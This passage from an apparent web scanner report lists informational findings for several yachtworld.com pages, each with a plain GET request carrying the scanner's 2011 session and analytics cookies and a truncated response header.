YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:58:53 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 34234
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en">
<head>
<title>Boat and Yacht Sales, Buy Boats and Yachts - YachtWorld.com
...[SNIP]...

16.6. https://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms.html.en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/byp/categories/BrokerageSales/YachtBrokerageFirms.html.en

Request

GET /byp/categories/BrokerageSales/YachtBrokerageFirms.html.en HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:58:48 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 36765
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en">
<head>
<title>Boat and Yacht Sales, Buy Boats and Yachts - YachtWorld.com
...[SNIP]...

16.7. https://www.yachtworld.com/byp/categories/Surveyors/index.html.en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/byp/categories/Surveyors/index.html.en

Request

GET /byp/categories/Surveyors/index.html.en HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:58:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 20753
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US">
<head>
<title>Boat and Yacht Sales, Buy Boats and Yachts - YachtWorld.
...[SNIP]...

16.8. https://www.yachtworld.com/byp/searchbyp.cgi.en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/byp/searchbyp.cgi.en

Request

GET /byp/searchbyp.cgi.en HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:58:57 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US">
<head>
<title>Boating and Marine Products and Services - YachtWorld.co
...[SNIP]...

16.9. https://www.yachtworld.com/core/globalnav/contactUs.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/globalnav/contactUs.jsp

Request

GET /core/globalnav/contactUs.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:24 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

16.10. https://www.yachtworld.com/core/globalnav/copyright.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/globalnav/copyright.jsp

Request

GET /core/globalnav/copyright.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:31 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

